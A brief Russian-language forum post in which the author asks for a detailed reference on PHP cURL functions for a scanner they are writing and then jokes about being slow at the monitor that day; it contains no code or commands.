стараюсь выразить на php более удобный сканер. проблемы с использованием "CURL функций". Может есть у кого (подробный ) справочник ?
или есть другие предложения? закипел после пяти минут (в редакторе) и отступился .. может туплю просто ..
Добавлено в [time]1162768095[/time]
не может , а туплю за мониторкой сегодня :fie: